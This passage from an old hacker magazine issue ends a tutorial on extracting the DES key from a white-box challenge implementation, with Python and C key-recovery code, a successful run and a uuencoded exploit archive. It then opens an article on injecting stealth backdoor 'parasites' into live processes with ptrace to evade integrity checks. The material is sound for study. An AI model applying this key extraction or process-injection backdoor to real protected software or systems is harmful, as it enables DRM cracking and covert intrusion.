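      [11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]]

# Relations for S5 and bit 01, copied from the ./exploit dump above.
DUMP = """
1 0 0 0 0 0 = 1
0 1 0 0 0 0 = 0
1 1 0 0 0 0 = 0
0 0 1 0 0 0 = 0
1 0 1 0 0 0 = 1
0 1 1 0 0 0 = 1
1 1 1 0 0 0 = 1
0 0 0 1 0 0 = 1
1 0 0 1 0 0 = 0
0 1 0 1 0 0 = 0
1 1 0 1 0 0 = 1
0 0 1 1 0 0 = 1
1 0 1 1 0 0 = 0
0 1 1 1 0 0 = 1
1 1 1 1 0 0 = 0
0 0 0 0 1 0 = 0
1 0 0 0 1 0 = 1
0 1 0 0 1 0 = 0
1 1 0 0 1 0 = 0
0 0 1 0 1 0 = 1
1 0 1 0 1 0 = 0
0 1 1 0 1 0 = 0
1 1 1 0 1 0 = 1
0 0 0 1 1 0 = 0
1 0 0 1 1 0 = 0
0 1 0 1 1 0 = 1
1 1 0 1 1 0 = 0
0 1 0 1 0 1 = 1
"""


def parse_relations(text):
    """Turn '{ b1 .. b6 } = { v }' rows into (input difference, v) pairs."""
    relations = []
    for line in text.split("\n"):
        if "=" not in line:
            continue
        bits, value = line.replace("{", "").replace("}", "").split("=")
        relations.append((int("".join(bits.split()), 2), int(value)))
    return relations


def s5_bit(x, out_bit=3):
    """One output bit of S5 for the 6-bit input x (b1 is the top bit)."""
    row = ((x >> 4) & 2) | (x & 1)     # b1 and b6 select the row
    col = (x >> 1) & 0xF               # b2..b5 select the column
    return (S5[row][col] >> out_bit) & 1


def candidates(relations):
    """6-bit subkey chunks consistent with every relation.

    For the null plaintext the S-box input is the chunk k itself, so each
    relation compares S5(k ^ d) with S5(k): v == 1 means 'unchanged'. This
    covers both hypotheses on the unknown bit b at once.
    """
    keep = []
    for k in range(64):
        ref = s5_bit(k)
        if all((s5_bit(k ^ d) == ref) == (v == 1) for d, v in relations):
            keep.append(k)
    return keep


def unit_vectors(relations):
    """Only the relations obtained from plaintexts of weight 1."""
    return [(d, v) for d, v in relations if bin(d).count("1") == 1]


RELATIONS = parse_relations(DUMP)

if __name__ == "__main__":
    print("unit vectors only:", [hex(k) for k in candidates(unit_vectors(RELATIONS))])
    print("all relations    :", [hex(k) for k in candidates(RELATIONS)])
```

    With the unit vectors alone three candidates survive (0x29, 0x31 and
0x37); the full dump leaves only 0x31, the candidate printed above.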


----[ 6.4 - Recovering the original key


    Now that we've retrieved the first subkey, our goal is almost reached.
So how do we retrieve the secret key? Well DES subkeys can be seen as
truncated permutations of the original key. This means that we now have 48
out of the 56 bits of the original key.

    I could explain the key scheduling mechanism of the DES, but it's
useless as the only important thing is to be able to reverse the
permutation. This is done easily thanks to the following python
manipulation applied to the sKMap1 array, itself being shamelessly ripped
from [R13]:

---------------------------------------------------------------------------
>>> InvsKMap1 = [ -1 for i in xrange(64) ]
>>> for x in xrange(len(InvsKMap1)):
...     if 7-x%8 == 0:
...             InvsKMap1[x] = -2
...
>>> for x in xrange(64):
...     if x in sKMap1:
...             InvsKMap1[x] = sKMap1.index(x)
...
>>> InvsKMap1
[19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10,
41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38,
26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7,
17, 18, 3, 36, 45, 39, -2]
>>>
---------------------------------------------------------------------------

    Here is the resulting array:

        char InvsKMap1[64] = {
            19,  8, 12, 29, 32, -1, -1, -2,
             9,  0, -1, -1, 44, 43, 40, -2,
             5, 22, 10, 41, 37, 24, 34, -2,
            15, 14, 21, 25, 35, 31, 47, -2,
             6,  2, 13, 20, 28, 38, 26, -2,
            23, 11, -1, 16, 42, -1, 30, -2,
             4, -1,  1, -1, 33, 27, 46, -2,
             7, 17, 18,  3, 36, 45, 39, -2
            };

    My exploit uses this array to build an original key out of both the
subkey bits and an 8 bits vector. '-1' is set for a bit position where the
value has to be guessed. There are 8 such positions, and for each of them,
a bit is taken from the 8 bits vector. '-2' means that the bit can be
anything.  Indeed the most significant bits (the so-called parity bits) of
the 8 bytes key array are never taken into account (hence the well known
8 x 7 = 56 bits keylength).

    Now the only remaining thing to do is to guess these 8 missing bits.
Obviously for each guess you will generate an original key 'K' and test it
against a known couple of input/output generated by the white-box. The
whole operation was implemented below:

---------------------------------------------------------------------------
void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits)
{
        int i,j;
        char *plastbits = (char *)&lastbits;

        memset(dst, 0, DES_KEY_LENGTH);
        for(i=0,j=0; i<64; i++)
        {
                // Parity bit
                if(InvsKMap1[i] == -2)
                        continue;

                // Bit is guessed
                else if(InvsKMap1[i] == -1)
                {
                        if(GETBIT(plastbits,j))
                                SETBIT(dst,i);
                        j++;
                }
                // Bit is already known
                else
                {
                        if(GETBIT(src, InvsKMap1[i]))
                                SETBIT(dst,i);
                }
        }
        return;
}

[...]

        const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3";
        const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2";
        DES_cblock key;
        DES_cblock out;
        DES_key_schedule ks;

        for(missing_bits=0; missing_bits<256; missing_bits++)
        {
            RebuildKeyFromSk1(key, sk, missing_bits);
            memset(out, 0, sizeof out);
            DES_set_key(&key, &ks);
            DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT);

            if(!memcmp(out,expected,DES_BLOCK_LENGTH))
            {
                printf("[+] Key was found!\n");
                [...]
            }
        }
---------------------------------------------------------------------------

    The whole cryptanalysis of the white-box is very effective and allows
us to retrieve a key in a few ms. More precisely it retrieves _1_ of the
256 possible 8 bytes keys ;)

---------------------------------------------------------------------------
$ tar xfz p68-exploit.tgz; cd p68-exploit
$ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES
$ md5sum wbDES
b9c4c69b08e12f577c91ec186edc5355  wbDES   # you can never be sure ;-)
$ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null  # is quite long
$ make
gcc -c wb_init.c -O3 -Wall
gcc -c wb_round.c -O3 -Wall
gcc -c wb_final.c -O3 -Wall
gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto
gcc wb_main.c *.o -O3 -Wall -o wbdes.try
gcc entropy.c -o entropy -lm
$ ./exploit

[+] Number of possible candidates = 256
	-> Required computation is 2^(8) * DES()

[+] Key was found!
	-> Missing bits: 0x3d
	-> Key: '02424626'

$
---------------------------------------------------------------------------

    And that's it! So the key was bf-able after all ;>
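
    Added example, not the author's exploit.c: the sKMap1 array is not
printed in the paper, so it is recomputed here in Python 3 from the
published PC-1 and PC-2 tables and the single left rotation of round 1, then
inverted and used the way RebuildKeyFromSk1() uses it. GETBIT/SETBIT are
assumed to number bits from the most significant bit of each byte, and the
comparison with the known key stands in for the DES check against a known
input/output pair; all function names are hypothetical.

```python
# Standard DES key-schedule tables (FIPS 46-3), 1-indexed as published.
PC1 = [57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18,
       10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36,
       63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22,
       14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4]
PC2 = [14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10,
       23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
       41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48,
       44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32]


def subkey1_map():
    """Key bit (0..63) that supplies each of the 48 bits of subkey 1."""
    c, d = PC1[:28], PC1[28:]
    cd = c[1:] + c[:1] + d[1:] + d[:1]   # round 1 rotates both halves left by 1
    return [cd[p - 1] - 1 for p in PC2]


def invert_map(sk_map):
    """Same construction as the InvsKMap1 session above.

    -2 marks a parity position (index 7 of each byte), -1 a key bit that
    subkey 1 does not contain, any other value the subkey bit to copy.
    """
    inv = [-2 if x % 8 == 7 else -1 for x in range(64)]
    for pos, key_bit in enumerate(sk_map):
        inv[key_bit] = pos
    return inv


SK_MAP1 = subkey1_map()
INV_SK_MAP1 = invert_map(SK_MAP1)


def get_bit(buf, i):
    """Bit i of a byte string, bit 0 being the MSB of byte 0 (assumption)."""
    return (buf[i // 8] >> (7 - i % 8)) & 1


def subkey1_bits(key):
    """The 48 bits of the first subkey of an 8-byte DES key."""
    return [get_bit(key, k) for k in SK_MAP1]


def sbox_chunk(subkey_bits, n):
    """6-bit slice of the subkey that is XORed into the input of S-box n."""
    chunk = 0
    for bit in subkey_bits[6 * (n - 1):6 * n]:
        chunk = (chunk << 1) | bit
    return chunk


def rebuild_key(subkey_bits, guess):
    """Python port of RebuildKeyFromSk1(): 48 known bits + 8 guessed bits."""
    key = bytearray(8)
    j = 0
    for i, src in enumerate(INV_SK_MAP1):
        if src == -2:                    # parity position, left at 0
            continue
        if src == -1:                    # missing bit: take the next guess bit
            bit = (guess >> (7 - j)) & 1
            j += 1
        else:                            # bit already known from subkey 1
            bit = subkey_bits[src]
        if bit:
            key[i // 8] |= 0x80 >> (i % 8)
    return bytes(key)


def matching_guesses(key):
    """Guesses (0..255) that rebuild `key` with its parity positions cleared."""
    sk = subkey1_bits(key)
    target = bytes(b & 0xFE for b in key)
    return [g for g in range(256) if rebuild_key(sk, g) == target]


if __name__ == "__main__":
    print(INV_SK_MAP1)
    key = b"02424626"                    # key printed by the run above
    print([hex(g) for g in matching_guesses(key)])
    print(hex(sbox_chunk(subkey1_bits(key), 5)))
```

    For the key printed by the run above, the only guess that rebuilds it is
0x3d, and the slice of the first subkey that goes to S-box 5 is 0x31.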


--[ 7 - Conclusion


    Nowadays there are a lot of white-box protections in the wild (DRM but
not only) using either academic designs or their improvements. Each of them
is an interesting challenge which is why you may want to face it one day.
This paper is not ground breaking nor even relevant for the average
cryptographer, the cryptanalysis of the naked DES being covered in many
papers including [R16]. I wrote it however with the hope that it would give
you an overview of what practical white-box cracking could be. I hope you
enjoyed it :)

    Feel free to contact me for any question related to this paper using
the mail alias provided in the title of the paper.


--[ 8 - Gr33tz


    Many (randomly ordered) thanks to:

    - the #f4lst4ff crypt0/b33r team for introducing me to the concept of
      white-box a few years ago.
    - Jb & Brecht for their implementations which gave me a lot of fun :)
    - X, Y, Z who will remain anonymous but nonetheless helped me to
      improve _significantly_ the paper. If you managed to understand a few
      things out of this "blabla" then you must thank them (and especially
      X). I owe you big time man :)
    - asciio authors because without this tool I would never have found the
      courage to write the paper
    - The Phrack Staff for publishing it


--[ 9 - References


[R01] http://en.wikipedia.org/wiki/Feistel_cipher
[R02] http://2009.hack.lu/index.php/ReverseChallenge
[R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/
      HackLu-Reverse-Challenge
[R04] http://www.whiteboxcrypto.com
[R05] "Cryptanalysis of a White Box AES Implementation", Billet et al.
      http://bo.blackowl.org/papers/waes.pdf
[R06] "Digital content protection: How to crack DRM and make them more
      resistant", Jean-Baptiste Bedrune
      http://esec-lab.sogeti.com/dotclear/public/publications/
      10-hitbkl-drm.pdf
[R07] "White-Box Cryptography and an AES Implementation", Eisen et al.
      http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps
[R08] "White-Box Cryptography and SPN ciphers", Schelkunov
      http://eprint.iacr.org/2010/419.pdf
[R09] "A White-box DES Implementation for DRM Applications", Chow et al.
      http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps
[R10] "White-Box Cryptography", James Muir, Irdeto
      http://www.mitacs.ca/events/images/stories/focusperiods/
      security-presentations/jmuir-mitacs-white-box-cryptography.pdf
[R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME
[R12] http://dhost.info/pasjagor/des/start.php
[R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition
[R14] "Clarifying Obfuscation: Improving the Security of White-Box
      Encoding", Link et al.
      http://eprint.iacr.org/2004/025.pdf
[R15] "White-Box Cryptography" (PhD thesis), B. Wyseur
      https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf
[R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al.
      http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf
[R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary
      External Encodings", B. Wyseur
      http://eprint.iacr.org/2007/104.pdf


--[ 10 - Appendix


begin 644 p68-exploit.tgz
MRE5IF&WJESI]6BK/:\]AP\?,O595!"_SZ*;=T:[A']VH%*/DNNG-GEG>Z0Q<
M]1*$WOX+,P'MUAYO*J"G$J9JZR00?]A+A(32I/?<[.QDST5%/FMP#XE7U3JY
MOS0`(3TQD_EUD=LD,(&J<-]%,`!R=3,FT\BZIU%)DV@\?DB,N*RGM;A?1HX>
MMLX/2<`;AAKY_>PE,7XEP(N[:]VO\)U#4P(G,7,XB5B/Z&I=[GIK=]+KDO5[
MQ\=H';P6]Y:NHV%/^#*YL\,>T<Z00$'FI.I^Z1;G8F6D6P]++[8KD9ZB*!Q7
M.U)`#[R@\\(#MYOPR,$]`@:;:'"7`"LR<,D$L1(%C^2`&AT*Z>&X]L1Z(W&3
MRF/'IK/MV.2LTQ%6%8K>JR?]]8^`R,31WE9-1,?T&I6UE$$Z"DN&B$!'@2EF
M0W>LOK`IO](233]#4IE\)^?"!B"5I",OQJTJGGDL!>///L\K2JM44D8YAV"R
M\^U<Y"_DPT'!>QL(DU&>)U9#+;G5UP>9RZ;)S&YGP[[NIE'L0$_]?<Z;B#(4
M$',5).(8AD[=,5Y7L_SQ^"MW;_/#:C8(\*8SKA1QB!<G4V$$X1,JI]AD_AL%
M/!+X!&X5XKVX831;K!)^)``)@_5'[=D(TB:>$@EP#SJ,V]1ZK3:>1GY2GT97
M\F<J@;U@>O4H6H%6=6;M0XB@;JL_O9JD![BAT0C!$:U&:#="IQ&ZC=!KA$VZ
M%F-T0K,36IW0[H1.)W0[H=<)FYWTTK-!*Z'1SB)46M9KT&`1K4FT9CL+-VFT
M9DIK$:W5SB)'&JV5TMI$:[>S*)!&:Z>T#M$Z[2RBH]$Z*:U+M&X[B\YHM&Y*
MZQ&MU\XB+1JME](VB;;9SJ(F&FTS/5O-'ZZK/]B89/Y(8T(S3`<L"65!E!(1
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M;?-J/!WOF?O?$NC*V6.#9SE7;G'5;+'%QR_/`G2)2S<*T>4.W2A87^'2!>L;
M.W1EJ+XD=NE"]26I0U<$Z\M<NF!]I4.7!^L;N72A^E*W/[*79WBWOYTX<YGD
MH4HSMU-X%J)SF8R#];F=$H?JRYU!$[\)U9>G+EVP/F?0Q*^#]94N7:B^PADT
M\:M0?05WZ8+U.?T1OVRKKYK>#JLC\?]C^'^]ZU+@^PL[3IB-N^2XTCZ^PB4X
MO;&P,W#[)F9?LCY;BH_0P_A`O^B3@_GD`(]#XLD$;[>)!F'[A"AY&R47E`R!
M$.%03S`GZ&5+/P*_N[+AI-$P3[SZQ,/8JGPB;SSA/X`,)&VLIFV4*5"V<)IK
M3EUQ_4J(OY8*$E?4`AS`CV^;`H]6"SP./)>U"9.Y8B-AWD:8"T)@>>#R//:%
M)A;]MI#%EL<+1^0DMIBFBL8M%6E1D]2G+]I8+R:31L^6;82EE)&Y7(IFVGO6
M5Y26TJ\@=L7,`CV4^"^1V[-)&7C.'Q`HS*AM0/OJ1,IQ0.PR(+:OY*#8F2OV
MJ"FP;PM<@=.FF>&M=H;':#X:G+:;&MXN;\H#\OIC)2COR%1P;%60A"R4(`-,
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MPY.DWQ#_0<5Z\$#?W4V?QBY0``3^GD^YV3X6??LS$9[)R*`1U]/3"OWJU_X!
M?^ZPY]=L#\]Q_OI^OA;U>KBQL?8]WM:2!>C8.F>C+01Z.:MNI\?547TIWNME
MM5A6U]5<'DQ>$5``.C#"79A9Q>2A1W5LU_[Z=GJYN*#&Q3=>FK"J9,<IBT_8
M"6?)F,U200Y0E*Y(]1RN\^,9.&YQO#SS","F\,0B249GS*,A&VD3I=D978G[
M(/($BSI_=(;9<\C6F2\IL[8SLY@RM0G<M<HR*KMT'I!5G^^*YDRNJ%M?<F8[
M[/ME+10^G5U]E+@55_-/U?*&S3Z>LMT!\`R>"`R'DBP[G"Y/KZ4G]H;X^Y/Q
M),"K"]"<;"V/82,DZI'5K=G>/BOEF2(^?[1+ESR/P$*+F@[X9CT1RVF9#5=9
MX9GU\;HY4CMB6R(G7D>(SO@VA5D?P#]/*X7W!8>'T^NCNF8WT]E%13=^Z')C
M_VAO+U-^SX[K-%;;7Y^NLRW&X\%NRU,]^5B#8?#?:^/WWV3WQWU2T/U9Q2<4
MFS5>9F@Z=^.M3/A#"'`T9(V./.EC"=SI&4-G]<RU-GRWAR1Y/-%_(`O6\9<"
M''E37US(UY61ER44.,,(FU57(>!^-[8$&!\[`]O]\_T<#<4.OMSPP+F\)D-#
MZWQO7PTL?<P74_0(H1D)DGBN%!)&@+ET:KW$90)5VP+\TNM=RAKO`P&C7UQL
MHJ?:,-E[C.?JP+V!_L(!]/"^@"^F+4?B._%?''W3.?J.TO>'?:.7#_:+[.N[
M!1;F`U[[Z'TPW+3[!_^Y#SSM]=_UT;)>W%P_>AS(^\9_S,LBYN)OB/_'N_B/
M3Y+:^A\NYVXO/C]:&W?T?Y8F,:[_.<]2BO^8E7G6K?^?(GWQEQ<?KY<O9O7\
M137_Q!:?;\[$I!-]P18(BT'KV[=?1X?U0DP1!U$3]]Z`W"?#J`EH/]3H]9DH
M;B#5#S4L?2&*LS9X?L(C&@TC`'D">/E,@0_E!#<$F.ZB=$PP\@@*GQ,T$9=P
M[ZFHFQ/Z$^(1E83&E,C@#KDHAG]R@DP"N"*`3TIDE(PRFHCEZ:%X3:9B17TU
M/\0E$:HC5>$@5,B)3`;MR*R`!2JH"@1UD:%+5-`6+@,BR']U`!A.`%:1_)=4
M/);834)8^2^A5J6D):&.*%&X6`4I`/4OVI7_HL(1,1_Y!KD.3ZAC0=\C`[T%
MW0"509<(X@AT4I)Z@#]0%;1;$`)_!)U94+^""-#'P!KTMV@R0FA_TCWJ.R7N
MH4^`.\2)D@A;B83CBBDZ`D!R(9P5=2SH##H9=)%CE`%1#(W1B`2UPN@$=>4$
M;Q7!2.$T:,8T?D"A.08```60^&H5`[*71L\J.Y&!H4"/O#3Y,J8+=D%ALG-B
M(>56<!*&@V0D1W1F<G&4ERCBV*I9AL*`'K-J3F34#>QGS!4BP#WJ>O[I<%:?
M]]\-=C#[K7B;A6"WB*!Q"XO=V^5T?EKU+ZJY(!I,D`H*ZV;ACFX/",Y7$>#)
M\`E[)]:S<*6\=DLD)_3%<MXH0H`6S)6++4%KQ"$3A!+UI#@3O"?:)H^@`:+M
MZ6)1B17>N^UZ?ES=]F\W$:G`JKX740N'RL)5?7R?APRO7D)%:VMK7ZM"L6H&
M9T^\E8E>M["*EA#,@``(CPIZ:.+ZXP4@3XAO#[;!@"TL%*W7^W'4^X(^(K`F
MN685JM^S"$7+H`I)6-,OJI84B,\>(+'(F&QQ(JG9YKYXF0V@#3Q!0F)5Y*7;
MQ_]"(PA#4,]/]]?7)6^@4X"A@(\^H-K![T;X=-X7PQ-^R4=$0^OOY^NJ^#D;
MH8>N10&\K!^LP]+:9*P]/QZN"6KIOE)O[O.[JI@,UZ/(K@(W4D@UE$L2DCO?
M#MQH3/`K5H^;A="\CL$ABN1X*3)]VUPPNCEA/[#]=9DA-:6?PGW<>B'=G+WQ
MIZE06Y)(C3\F)LR#6]%%$+S1;NWMU_T?!HT6U>.#79?Z71PD/=A)$SH`?X>?
M[W:VQ>4[U&R-)Q#O8O56#"@/-+9(9"8"P?=4Z^\!!XXA/OL/?__F]2L:_#H/
M_(PD+`_<R%\7_=B_%=9JJX_5/F?90!BJ38:_7H"Y@K\\77RS0CHQ[%`Z[0@?
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ML++A'DIL#/JHA$W![P:PN?GL<@/.0N/-9_7FL_,-51,UO;D)/\0TXG"`G$O6
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M7TX';(_%`SJUP5`>%%:B-X,;W%.:I9P.%+P>/#^>,%S(84@0`/S&2'57)SNP
M#*(>;>6I9]:B+B/L?$@-M[=U<?738S858X?*=S_99M]!'/(C*_Z+T.V-&/!S
M#8J.\2P%`W#O6C0_+KQ>_8[H9Q;Q_!-`W@.:-*T.$?!\IH92NLW>@'OKQ>>A
M]%6&9DV#-_5EQ::XN*PQ^M>Q#]@^TW37+B&-(7NU)%[&>G-_9-FAIKJ,U@_H
M]9S`828X/F^>#^F30OQ%"Q?OG9.*S+;9WUY_CX@`T:KH+TVCU%C8_-%G+/^?
MDX?_@D[23XS_6W`>&_Q?GN#Y7UIVYW]/D1YZ_K=VL@HF6%T:!3`/L8BNQ!O8
M#E3"S.XU()4\"-]%[Z)_".((B^6"0ON(OPKBH^[VF.$C_M_0_OC(HPO5QUW\
MUC!X\6A7,[<*0=@0A5I,$D.T"CO8$&5GO0!58:CREX(JL+D_\S;W:8-I1AB'
M)[1;_V%R`/V,D*^T$1K;^U62CBLZ;J&HFOU5J-/;AS/PAZH*C&TCLJR&7KS@
MB<64WGL[H?,`V:;$>&TPE2J"]#Y,N?*DFAF"-Q4C@:?6PR1"RW:Z!P]W(F$%
MM6@@TZA%TYEB-ENMZ5S1Y0\7*K,TC`^"5)DG5>%+-0I)-7:E&D?!KBH4TT6@
MJTI%4#Y<JMR72O"2>T(UMH%Y"Y3?B80!-%()_21Q4*J18GH4D&JL",:3R0.%
M*EJ$*CRA>!P\2E'"<$\8'NXCKM]U'@?DX>8UO]=[[CY<>J^4D*BTG_4.9JYK
MUI3'LA&NN6I:*]J:;WF1S!Y[B^FZPVIQ\S+XZC.LX2D"(^-E\;C*?,E'PERZ
MMNQ.G?LRINXX8`U;UG)0$@=%'3FBMM@T[P''MMTIJFOA'BQJYEHEV[S1J8F<
MD8V@25#0L=NG#2NWRLRIPZ0@IZ[->["<N2NG;_&2I-&A64A.R^;I#A5V+RRH
M8_GNDM.V@K]!3ML2XH3EF\&D,0\G15!2[K^E#[.*#5D]9AT#^7!92[=/2U_2
MXLXJ'`L)LB7A4T/KB-`^..R^L?]3D_?]#QNP3X[_FG.NO__CO,-_?<K4N++;
M_F&OT`"BWPLOMKLMU]V6DX7=;;GNMEQW6ZZ[+?>?=5ONCY[(N]2E+G6I2UWJ
M4I>ZU*4N=:E+7>I2E[K4I2YUJ4M=ZE*7NM2E+G6I2UWJ4I>ZU*4N=:E+7>K2
,?TWZ/VX96&``\```
`
end


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13

|=-----------------------------------------------------------------------=|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ 0. Introduction
------[ 1. Brief discussion on injection methods
------[ 2. First generation: fork() and clone()
------[ 3. Second generation: signal()/alarm()
------[ 4. Third generation: setitimer()
------[ 5. Working parasites
------------[ 5.1 Process and thread backdoor
------------[ 5.2 Remote "tail follow" parasite
------------[ 5.3 Single process backdoor
------[ 6. Something about the injector
------[ 7. Further readings
------[ 8. Links and references

------[ 0. Introduction

In biology a parasite is an organism that grows, feeds, and lives in a
different organism while contributing nothing to the survival of its host.

(There is another interesting definition that, even if it's less relevant,
I find funny: a professional dinner guest, especially in ancient Greece.
From Greek parasitos, person who eats at someone else's table,
parasite: para-, beside; sitos, grain, food.)

So, without digressing too much, what do we mean by "parasite" in this
document? A parasite is simply some executable code that lives within
another process, but that was injected after its loading time, by a
third person/program.

Any process can become infected quite easily, using standard libraries
provided by operating systems (we will use process trace, ptrace [0]).

The real difficulty for the parasite is to coexist peacefully with the host
process, without killing it. By "death" of the host we also mean a
situation where, even if the process remains active, it is no longer
able to work properly, because its memory has been corrupted.

The goal of this document is to create a parasite that lives and lets the
host process live, as if nothing had happened.

Starting with simple techniques, and gradually improving the parasite,
we'll reach a point where our creature is scheduled inside the process of
the host, without the need for fork() or similar calls (i.e. clone()).

An interesting question is: why is a parasite an excellent backdoor?

The simplest answer is that a parasite hides what is not permitted in what
is allowed, so that:
  - it's difficult to detect using conventional tools
  - it's more stable and easy to use than kernel-level rootkits.

If the target system has security tools that automatically monitor the
integrity of executable files, but that do not perform complete audits of
memory, the parasite will not trigger any alarm.

After this introduction we can dive into the problem.

If you prefer practical examples, you can "jump" to section 5,
which shows three different types of real parasites.

------[ 1. Brief discussion on injection methods

To separate the creation of the shellcode from the methods used to inject
it into the host process, this section will discuss how the parasite is
injected (in the examples of this document).

Unlike normal shellcode that, depending on the vulnerability exploited,
cannot contain certain types of characters (e.g. NULLs), a parasite has
no particular restrictions.

It can contain any character, even NULL bytes, because ptrace [0] allows us
to directly modify the .text section of a process.

The first question that arises regards where to place parasitic code.
This memory location must not be essential to the program, and should not
be invoked by the code after the start (or shortly after the start) of
the host process.

We can use run-time patching, but it's a complicated technique and makes it
difficult to ensure the correct functioning of the process after the
manipulation. It is therefore not suitable for complex parasites.

The author has chosen to inject the code into the memory range of the
libdl.so library, since it is used during the loading stage of programs but
is then usually no longer necessary (more info: [1][2]).

Another reason for this choice is that the memory address of the library,
when loaded into the process, is exported in the /proc filesystem.

You can easily see that by typing:
$ cat /proc/self/maps
...
